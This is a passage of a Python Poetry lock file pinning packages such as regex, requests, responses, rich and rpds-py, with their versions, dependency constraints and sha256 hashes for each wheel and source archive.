{file = "referencing-0.30.2-py3-none-any.whl", hash = "sha256:449b6669b6121a9e96a7f9e410b245d471e8d48964c67113ce9afe50c8dd7bdf"}, {file = "referencing-0.30.2.tar.gz", hash = "sha256:794ad8003c65938edcdbc027f1933215e0d0ccc0291e3ce20a4d87432b59efc0"}, ] [package.dependencies] attrs = ">=22.2.0" rpds-py = ">=0.7.0" [[package]] name = "regex" version = "2023.10.3" description = "Alternative regular expression module, to replace re." 
optional = false python-versions = ">=3.7" files = [ {file = "regex-2023.10.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:4c34d4f73ea738223a094d8e0ffd6d2c1a1b4c175da34d6b0de3d8d69bee6bcc"}, {file = "regex-2023.10.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:a8f4e49fc3ce020f65411432183e6775f24e02dff617281094ba6ab079ef0915"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4cd1bccf99d3ef1ab6ba835308ad85be040e6a11b0977ef7ea8c8005f01a3c29"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:81dce2ddc9f6e8f543d94b05d56e70d03a0774d32f6cca53e978dc01e4fc75b8"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9c6b4d23c04831e3ab61717a707a5d763b300213db49ca680edf8bf13ab5d91b"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c15ad0aee158a15e17e0495e1e18741573d04eb6da06d8b84af726cfc1ed02ee"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6239d4e2e0b52c8bd38c51b760cd870069f0bdf99700a62cd509d7a031749a55"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:4a8bf76e3182797c6b1afa5b822d1d5802ff30284abe4599e1247be4fd6b03be"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d9c727bbcf0065cbb20f39d2b4f932f8fa1631c3e01fcedc979bd4f51fe051c5"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:3ccf2716add72f80714b9a63899b67fa711b654be3fcdd34fa391d2d274ce767"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:107ac60d1bfdc3edb53be75e2a52aff7481b92817cfdddd9b4519ccf0e54a6ff"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:00ba3c9818e33f1fa974693fb55d24cdc8ebafcb2e4207680669d8f8d7cca79a"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f0a47efb1dbef13af9c9a54a94a0b814902e547b7f21acb29434504d18f36e3a"}, {file = "regex-2023.10.3-cp310-cp310-win32.whl", hash = "sha256:36362386b813fa6c9146da6149a001b7bd063dabc4d49522a1f7aa65b725c7ec"}, {file = "regex-2023.10.3-cp310-cp310-win_amd64.whl", hash = "sha256:c65a3b5330b54103e7d21cac3f6bf3900d46f6d50138d73343d9e5b2900b2353"}, {file = "regex-2023.10.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:90a79bce019c442604662d17bf69df99090e24cdc6ad95b18b6725c2988a490e"}, {file = "regex-2023.10.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:c7964c2183c3e6cce3f497e3a9f49d182e969f2dc3aeeadfa18945ff7bdd7051"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4ef80829117a8061f974b2fda8ec799717242353bff55f8a29411794d635d964"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5addc9d0209a9afca5fc070f93b726bf7003bd63a427f65ef797a931782e7edc"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c148bec483cc4b421562b4bcedb8e28a3b84fcc8f0aa4418e10898f3c2c0eb9b"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8d1f21af4c1539051049796a0f50aa342f9a27cde57318f2fc41ed50b0dbc4ac"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = 
"sha256:0b9ac09853b2a3e0d0082104036579809679e7715671cfbf89d83c1cb2a30f58"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ebedc192abbc7fd13c5ee800e83a6df252bec691eb2c4bedc9f8b2e2903f5e2a"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:d8a993c0a0ffd5f2d3bda23d0cd75e7086736f8f8268de8a82fbc4bd0ac6791e"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:be6b7b8d42d3090b6c80793524fa66c57ad7ee3fe9722b258aec6d0672543fd0"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:4023e2efc35a30e66e938de5aef42b520c20e7eda7bb5fb12c35e5d09a4c43f6"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:0d47840dc05e0ba04fe2e26f15126de7c755496d5a8aae4a08bda4dd8d646c54"}, {file = "regex-2023.10.3-cp311-cp311-win32.whl", hash = "sha256:9145f092b5d1977ec8c0ab46e7b3381b2fd069957b9862a43bd383e5c01d18c2"}, {file = "regex-2023.10.3-cp311-cp311-win_amd64.whl", hash = "sha256:b6104f9a46bd8743e4f738afef69b153c4b8b592d35ae46db07fc28ae3d5fb7c"}, {file = "regex-2023.10.3-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:bff507ae210371d4b1fe316d03433ac099f184d570a1a611e541923f78f05037"}, {file = "regex-2023.10.3-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:be5e22bbb67924dea15039c3282fa4cc6cdfbe0cbbd1c0515f9223186fc2ec5f"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a992f702c9be9c72fa46f01ca6e18d131906a7180950958f766c2aa294d4b41"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7434a61b158be563c1362d9071358f8ab91b8d928728cd2882af060481244c9e"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c2169b2dcabf4e608416f7f9468737583ce5f0a6e8677c4efbf795ce81109d7c"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a9e908ef5889cda4de038892b9accc36d33d72fb3e12c747e2799a0e806ec841"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:12bd4bc2c632742c7ce20db48e0d99afdc05e03f0b4c1af90542e05b809a03d9"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:bc72c231f5449d86d6c7d9cc7cd819b6eb30134bb770b8cfdc0765e48ef9c420"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:bce8814b076f0ce5766dc87d5a056b0e9437b8e0cd351b9a6c4e1134a7dfbda9"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:ba7cd6dc4d585ea544c1412019921570ebd8a597fabf475acc4528210d7c4a6f"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:b0c7d2f698e83f15228ba41c135501cfe7d5740181d5903e250e47f617eb4292"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:5a8f91c64f390ecee09ff793319f30a0f32492e99f5dc1c72bc361f23ccd0a9a"}, {file = "regex-2023.10.3-cp312-cp312-win32.whl", hash = "sha256:ad08a69728ff3c79866d729b095872afe1e0557251da4abb2c5faff15a91d19a"}, {file = "regex-2023.10.3-cp312-cp312-win_amd64.whl", hash = "sha256:39cdf8d141d6d44e8d5a12a8569d5a227f645c87df4f92179bd06e2e2705e76b"}, {file = "regex-2023.10.3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:4a3ee019a9befe84fa3e917a2dd378807e423d013377a884c1970a3c2792d293"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 
"sha256:76066d7ff61ba6bf3cb5efe2428fc82aac91802844c022d849a1f0f53820502d"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bfe50b61bab1b1ec260fa7cd91106fa9fece57e6beba05630afe27c71259c59b"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fd88f373cb71e6b59b7fa597e47e518282455c2734fd4306a05ca219a1991b0"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b3ab05a182c7937fb374f7e946f04fb23a0c0699c0450e9fb02ef567412d2fa3"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:dac37cf08fcf2094159922edc7a2784cfcc5c70f8354469f79ed085f0328ebdf"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:e54ddd0bb8fb626aa1f9ba7b36629564544954fff9669b15da3610c22b9a0991"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:3367007ad1951fde612bf65b0dffc8fd681a4ab98ac86957d16491400d661302"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:16f8740eb6dbacc7113e3097b0a36065a02e37b47c936b551805d40340fb9971"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:f4f2ca6df64cbdd27f27b34f35adb640b5d2d77264228554e68deda54456eb11"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:39807cbcbe406efca2a233884e169d056c35aa7e9f343d4e78665246a332f597"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:7eece6fbd3eae4a92d7c748ae825cbc1ee41a89bb1c3db05b5578ed3cfcfd7cb"}, {file = "regex-2023.10.3-cp37-cp37m-win32.whl", hash = "sha256:ce615c92d90df8373d9e13acddd154152645c0dc060871abf6bd43809673d20a"}, {file = "regex-2023.10.3-cp37-cp37m-win_amd64.whl", hash = "sha256:0f649fa32fe734c4abdfd4edbb8381c74abf5f34bc0b3271ce687b23729299ed"}, {file = "regex-2023.10.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9b98b7681a9437262947f41c7fac567c7e1f6eddd94b0483596d320092004533"}, {file = "regex-2023.10.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:91dc1d531f80c862441d7b66c4505cd6ea9d312f01fb2f4654f40c6fdf5cc37a"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:82fcc1f1cc3ff1ab8a57ba619b149b907072e750815c5ba63e7aa2e1163384a4"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7979b834ec7a33aafae34a90aad9f914c41fd6eaa8474e66953f3f6f7cbd4368"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:ef71561f82a89af6cfcbee47f0fabfdb6e63788a9258e913955d89fdd96902ab"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd829712de97753367153ed84f2de752b86cd1f7a88b55a3a775eb52eafe8a94"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:00e871d83a45eee2f8688d7e6849609c2ca2a04a6d48fba3dff4deef35d14f07"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:706e7b739fdd17cb89e1fbf712d9dc21311fc2333f6d435eac2d4ee81985098c"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:cc3f1c053b73f20c7ad88b0d1d23be7e7b3901229ce89f5000a8399746a6e039"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_i686.whl", hash = 
"sha256:6f85739e80d13644b981a88f529d79c5bdf646b460ba190bffcaf6d57b2a9863"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:741ba2f511cc9626b7561a440f87d658aabb3d6b744a86a3c025f866b4d19e7f"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:e77c90ab5997e85901da85131fd36acd0ed2221368199b65f0d11bca44549711"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:979c24cbefaf2420c4e377ecd1f165ea08cc3d1fbb44bdc51bccbbf7c66a2cb4"}, {file = "regex-2023.10.3-cp38-cp38-win32.whl", hash = "sha256:58837f9d221744d4c92d2cf7201c6acd19623b50c643b56992cbd2b745485d3d"}, {file = "regex-2023.10.3-cp38-cp38-win_amd64.whl", hash = "sha256:c55853684fe08d4897c37dfc5faeff70607a5f1806c8be148f1695be4a63414b"}, {file = "regex-2023.10.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2c54e23836650bdf2c18222c87f6f840d4943944146ca479858404fedeb9f9af"}, {file = "regex-2023.10.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:69c0771ca5653c7d4b65203cbfc5e66db9375f1078689459fe196fe08b7b4930"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6ac965a998e1388e6ff2e9781f499ad1eaa41e962a40d11c7823c9952c77123e"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1c0e8fae5b27caa34177bdfa5a960c46ff2f78ee2d45c6db15ae3f64ecadde14"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:6c56c3d47da04f921b73ff9415fbaa939f684d47293f071aa9cbb13c94afc17d"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7ef1e014eed78ab650bef9a6a9cbe50b052c0aebe553fb2881e0453717573f52"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d29338556a59423d9ff7b6eb0cb89ead2b0875e08fe522f3e068b955c3e7b59b"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:9c6d0ced3c06d0f183b73d3c5920727268d2201aa0fe6d55c60d68c792ff3588"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:994645a46c6a740ee8ce8df7911d4aee458d9b1bc5639bc968226763d07f00fa"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:66e2fe786ef28da2b28e222c89502b2af984858091675044d93cb50e6f46d7af"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:11175910f62b2b8c055f2b089e0fedd694fe2be3941b3e2633653bc51064c528"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:06e9abc0e4c9ab4779c74ad99c3fc10d3967d03114449acc2c2762ad4472b8ca"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:fb02e4257376ae25c6dd95a5aec377f9b18c09be6ebdefa7ad209b9137b73d48"}, {file = "regex-2023.10.3-cp39-cp39-win32.whl", hash = "sha256:3b2c3502603fab52d7619b882c25a6850b766ebd1b18de3df23b2f939360e1bd"}, {file = "regex-2023.10.3-cp39-cp39-win_amd64.whl", hash = "sha256:adbccd17dcaff65704c856bd29951c58a1bd4b2b0f8ad6b826dbd543fe740988"}, {file = "regex-2023.10.3.tar.gz", hash = "sha256:3fef4f844d2290ee0ba57addcec17eec9e3df73f10a2748485dfd6a3a188cc0f"}, ] [[package]] name = "requests" version = "2.31.0" description = "Python HTTP for Humans." 
optional = false python-versions = ">=3.7" files = [ {file = "requests-2.31.0-py3-none-any.whl", hash = "sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f"}, {file = "requests-2.31.0.tar.gz", hash = "sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1"}, ] [package.dependencies] certifi = ">=2017.4.17" charset-normalizer = ">=2,<4" idna = ">=2.5,<4" PySocks = {version = ">=1.5.6,<1.5.7 || >1.5.7", optional = true, markers = "extra == \"socks\""} urllib3 = ">=1.21.1,<3" [package.extras] socks = ["PySocks (>=1.5.6,!=1.5.7)"] use-chardet-on-py3 = ["chardet (>=3.0.2,<6)"] [[package]] name = "requests-file" version = "1.5.1" description = "File transport adapter for Requests" optional = true python-versions = "*" files = [ {file = "requests-file-1.5.1.tar.gz", hash = "sha256:07d74208d3389d01c38ab89ef403af0cfec63957d53a0081d8eca738d0247d8e"}, {file = "requests_file-1.5.1-py2.py3-none-any.whl", hash = "sha256:dfe5dae75c12481f68ba353183c53a65e6044c923e64c24b2209f6c7570ca953"}, ] [package.dependencies] requests = ">=1.0.0" six = "*" [[package]] name = "requests-mock" version = "1.11.0" description = "Mock out responses from the requests package" optional = false python-versions = "*" files = [ {file = "requests-mock-1.11.0.tar.gz", hash = "sha256:ef10b572b489a5f28e09b708697208c4a3b2b89ef80a9f01584340ea357ec3c4"}, {file = "requests_mock-1.11.0-py2.py3-none-any.whl", hash = "sha256:f7fae383f228633f6bececebdab236c478ace2284d6292c6e7e2867b9ab74d15"}, ] [package.dependencies] requests = ">=2.3,<3" six = "*" [package.extras] fixture = ["fixtures"] test = ["fixtures", "mock", "purl", "pytest", "requests-futures", "sphinx", "testtools"] [[package]] name = "requests-oauthlib" version = "1.3.1" description = "OAuthlib authentication support for Requests." optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "requests-oauthlib-1.3.1.tar.gz", hash = "sha256:75beac4a47881eeb94d5ea5d6ad31ef88856affe2332b9aafb52c6452ccf0d7a"}, {file = "requests_oauthlib-1.3.1-py2.py3-none-any.whl", hash = "sha256:2577c501a2fb8d05a304c09d090d6e47c306fef15809d102b327cf8364bddab5"}, ] [package.dependencies] oauthlib = ">=3.0.0" requests = ">=2.0.0" [package.extras] rsa = ["oauthlib[signedtoken] (>=3.0.0)"] [[package]] name = "requests-toolbelt" version = "1.0.0" description = "A utility belt for advanced users of python-requests" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "requests-toolbelt-1.0.0.tar.gz", hash = "sha256:7681a0a3d047012b5bdc0ee37d7f8f07ebe76ab08caeccfc3921ce23c88d5bc6"}, {file = "requests_toolbelt-1.0.0-py2.py3-none-any.whl", hash = "sha256:cccfdd665f0a24fcf4726e690f65639d272bb0637b9b92dfd91a5568ccf6bd06"}, ] [package.dependencies] requests = ">=2.0.1,<3.0.0" [[package]] name = "responses" version = "0.22.0" description = "A utility library for mocking out the `requests` Python library." 
optional = false python-versions = ">=3.7" files = [ {file = "responses-0.22.0-py3-none-any.whl", hash = "sha256:dcf294d204d14c436fddcc74caefdbc5764795a40ff4e6a7740ed8ddbf3294be"}, {file = "responses-0.22.0.tar.gz", hash = "sha256:396acb2a13d25297789a5866b4881cf4e46ffd49cc26c43ab1117f40b973102e"}, ] [package.dependencies] requests = ">=2.22.0,<3.0" toml = "*" types-toml = "*" urllib3 = ">=1.25.10" [package.extras] tests = ["coverage (>=6.0.0)", "flake8", "mypy", "pytest (>=7.0.0)", "pytest-asyncio", "pytest-cov", "pytest-httpserver", "types-requests"] [[package]] name = "retry" version = "0.9.2" description = "Easy to use retry decorator." optional = true python-versions = "*" files = [ {file = "retry-0.9.2-py2.py3-none-any.whl", hash = "sha256:ccddf89761fa2c726ab29391837d4327f819ea14d244c232a1d24c67a2f98606"}, {file = "retry-0.9.2.tar.gz", hash = "sha256:f8bfa8b99b69c4506d6f5bd3b0aabf77f98cdb17f3c9fc3f5ca820033336fba4"}, ] [package.dependencies] decorator = ">=3.4.2" py = ">=1.4.26,<2.0.0" [[package]] name = "rfc3339-validator" version = "0.1.4" description = "A pure python RFC3339 validator" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "rfc3339_validator-0.1.4-py2.py3-none-any.whl", hash = "sha256:24f6ec1eda14ef823da9e36ec7113124b39c04d50a4d3d3a3c2859577e7791fa"}, {file = "rfc3339_validator-0.1.4.tar.gz", hash = "sha256:138a2abdf93304ad60530167e51d2dfb9549521a836871b88d7f4695d0022f6b"}, ] [package.dependencies] six = "*" [[package]] name = "rfc3986-validator" version = "0.1.1" description = "Pure python rfc3986 validator" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "rfc3986_validator-0.1.1-py2.py3-none-any.whl", hash = "sha256:2f235c432ef459970b4306369336b9d5dbdda31b510ca1e327636e01f528bfa9"}, {file = "rfc3986_validator-0.1.1.tar.gz", hash = "sha256:3d44bde7921b3b9ec3ae4e3adca370438eccebc676456449b145d533b240d055"}, ] [[package]] name = "rich" version = "13.6.0" description = "Render rich text, tables, progress bars, syntax highlighting, markdown and more to the terminal" optional = true python-versions = ">=3.7.0" files = [ {file = "rich-13.6.0-py3-none-any.whl", hash = "sha256:2b38e2fe9ca72c9a00170a1a2d20c63c790d0e10ef1fe35eba76e1e7b1d7d245"}, {file = "rich-13.6.0.tar.gz", hash = "sha256:5c14d22737e6d5084ef4771b62d5d4363165b403455a30a1c8ca39dc7b644bef"}, ] [package.dependencies] markdown-it-py = ">=2.2.0" pygments = ">=2.13.0,<3.0.0" typing-extensions = {version = ">=4.0.0,<5.0", markers = "python_version < \"3.9\""} [package.extras] jupyter = ["ipywidgets (>=7.5.1,<9)"] [[package]] name = "rpds-py" version = "0.10.6" description = "Python bindings to Rust's persistent data structures (rpds)" optional = false python-versions = ">=3.8" files = [ {file = "rpds_py-0.10.6-cp310-cp310-macosx_10_7_x86_64.whl", hash = "sha256:6bdc11f9623870d75692cc33c59804b5a18d7b8a4b79ef0b00b773a27397d1f6"}, {file = "rpds_py-0.10.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:26857f0f44f0e791f4a266595a7a09d21f6b589580ee0585f330aaccccb836e3"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d7f5e15c953ace2e8dde9824bdab4bec50adb91a5663df08d7d994240ae6fa31"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:61fa268da6e2e1cd350739bb61011121fa550aa2545762e3dc02ea177ee4de35"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = 
"sha256:c48f3fbc3e92c7dd6681a258d22f23adc2eb183c8cb1557d2fcc5a024e80b094"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c0503c5b681566e8b722fe8c4c47cce5c7a51f6935d5c7012c4aefe952a35eed"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:734c41f9f57cc28658d98270d3436dba65bed0cfc730d115b290e970150c540d"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:a5d7ed104d158c0042a6a73799cf0eb576dfd5fc1ace9c47996e52320c37cb7c"}, {file = "rpds_py-0.10.6-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:e3df0bc35e746cce42579826b89579d13fd27c3d5319a6afca9893a9b784ff1b"}, {file = "rpds_py-0.10.6-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:73e0a78a9b843b8c2128028864901f55190401ba38aae685350cf69b98d9f7c9"}, {file = "rpds_py-0.10.6-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:5ed505ec6305abd2c2c9586a7b04fbd4baf42d4d684a9c12ec6110deefe2a063"}, {file = "rpds_py-0.10.6-cp310-none-win32.whl", hash = "sha256:d97dd44683802000277bbf142fd9f6b271746b4846d0acaf0cefa6b2eaf2a7ad"}, {file = "rpds_py-0.10.6-cp310-none-win_amd64.whl", hash = "sha256:b455492cab07107bfe8711e20cd920cc96003e0da3c1f91297235b1603d2aca7"}, {file = "rpds_py-0.10.6-cp311-cp311-macosx_10_7_x86_64.whl", hash = "sha256:e8cdd52744f680346ff8c1ecdad5f4d11117e1724d4f4e1874f3a67598821069"}, {file = "rpds_py-0.10.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:66414dafe4326bca200e165c2e789976cab2587ec71beb80f59f4796b786a238"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cc435d059f926fdc5b05822b1be4ff2a3a040f3ae0a7bbbe672babb468944722"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:8e7f2219cb72474571974d29a191714d822e58be1eb171f229732bc6fdedf0ac"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3953c6926a63f8ea5514644b7afb42659b505ece4183fdaaa8f61d978754349e"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2bb2e4826be25e72013916eecd3d30f66fd076110de09f0e750163b416500721"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7bf347b495b197992efc81a7408e9a83b931b2f056728529956a4d0858608b80"}, {file = "rpds_py-0.10.6-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:102eac53bb0bf0f9a275b438e6cf6904904908562a1463a6fc3323cf47d7a532"}, {file = "rpds_py-0.10.6-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:40f93086eef235623aa14dbddef1b9fb4b22b99454cb39a8d2e04c994fb9868c"}, {file = "rpds_py-0.10.6-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:e22260a4741a0e7a206e175232867b48a16e0401ef5bce3c67ca5b9705879066"}, {file = "rpds_py-0.10.6-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:f4e56860a5af16a0fcfa070a0a20c42fbb2012eed1eb5ceeddcc7f8079214281"}, {file = "rpds_py-0.10.6-cp311-none-win32.whl", hash = "sha256:0774a46b38e70fdde0c6ded8d6d73115a7c39d7839a164cc833f170bbf539116"}, {file = "rpds_py-0.10.6-cp311-none-win_amd64.whl", hash = "sha256:4a5ee600477b918ab345209eddafde9f91c0acd931f3776369585a1c55b04c57"}, {file = "rpds_py-0.10.6-cp312-cp312-macosx_10_7_x86_64.whl", hash = "sha256:5ee97c683eaface61d38ec9a489e353d36444cdebb128a27fe486a291647aff6"}, {file = "rpds_py-0.10.6-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:0713631d6e2d6c316c2f7b9320a34f44abb644fc487b77161d1724d883662e31"}, {file 
